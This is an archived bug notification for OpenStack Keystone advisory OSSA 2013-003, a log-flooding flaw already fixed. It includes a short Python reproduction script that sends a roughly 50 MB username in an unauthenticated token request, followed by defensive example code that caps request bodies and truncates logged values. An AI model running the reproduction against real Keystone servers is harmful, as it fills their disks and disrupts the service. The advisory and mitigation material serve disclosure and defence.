yahoo-eng-team team mailing list archive

[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

 

** Summary changed:

- unauthenticated POST to /tokens can fill up disk/logs
+ [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1098307

Title:
  [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  A remote unauthenticated Keystone user could potentially fill up the
  disk on a Keystone server by running the following Python script:

  -----------------------
  from keystoneclient.v2_0 import client

  PASSWORD = 'foobar'
  TENANT = 'blah'
  USER = '00000' * 9999999  # ~50 MB username sent in a single /tokens request

  keystone = client.Client(username=USER,
                           password=PASSWORD,
                           tenant_name=TENANT,
                           auth_url='http://localhost:5000/v2.0')

  -----------

  Running this script will increase the log file size by 100 MB per
  request. NOTE: This happens when running keystone at the default log
  levels:

  # verbose = False
  # debug = False

  
  Version-Release number of selected component (if applicable):

  openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)

  How reproducible:

  *always*

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1098307/+subscriptions
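Added example (not Keystone's code, and not the fix that shipped for this bug): two defensive controls against the log amplification described in the report, a request-body cap enforced before anything is parsed or logged, and a bound on any request-controlled value that gets copied into a log line. The 64 KB and 256-character limits, the function names and the constructed request body are assumptions.

```python
import io
import json

MAX_BODY_BYTES = 64 * 1024   # assumed cap on a token request body
MAX_LOGGED_FIELD = 256       # assumed cap on any one value written to a log line

class RequestTooLarge(Exception): """Raised before any byte of the body is parsed or logged."""

def read_body(content_length, stream):
    """Refuse by declared Content-Length, then enforce the same cap while
    reading, so a client that lies about the length still cannot exceed it."""
    if content_length is not None and content_length > MAX_BODY_BYTES:
        raise RequestTooLarge(f"declared length {content_length} exceeds cap")
    data = stream.read(MAX_BODY_BYTES + 1)
    if len(data) > MAX_BODY_BYTES:
        raise RequestTooLarge("body exceeds cap")
    return data

def truncate_for_log(value, limit=MAX_LOGGED_FIELD):
    """Bound the size of any request-controlled value copied into a log line."""
    text = str(value)
    if len(text) <= limit:
        return text
    return f"{text[:limit]}...[{len(text) - limit} chars truncated]"

def auth_failure_message(body):
    """Log line for a failed v2.0 token request; the username is bounded."""
    try:
        name = json.loads(body)["auth"]["passwordCredentials"].get("username", "")
    except (ValueError, KeyError, TypeError, AttributeError):
        return "auth failed: malformed credentials"
    return f"auth failed for user {truncate_for_log(name)}"

def handle_token_request(content_length, stream):
    """Return (HTTP status, log line). Credential checking is out of scope,
    so every request that fits under the cap is logged as a failed login."""
    try:
        body = read_body(content_length, stream)
    except RequestTooLarge as exc:
        return 413, f"rejected token request: {exc}"
    return 401, auth_failure_message(body)

def constructed_request(username, declared_length=None):
    """Constructed v2.0 token body as keystoneclient sends it; declared_length
    simulates a dishonest Content-Length header."""
    body = json.dumps({"auth": {"tenantName": "blah", "passwordCredentials":
                       {"username": username, "password": "foobar"}}}).encode()
    return (len(body) if declared_length is None else declared_length,
            io.BytesIO(body))
```

With the report's 50 MB username the request is refused on the declared length alone, and the log line written for it is a fixed few dozen characters instead of the whole body.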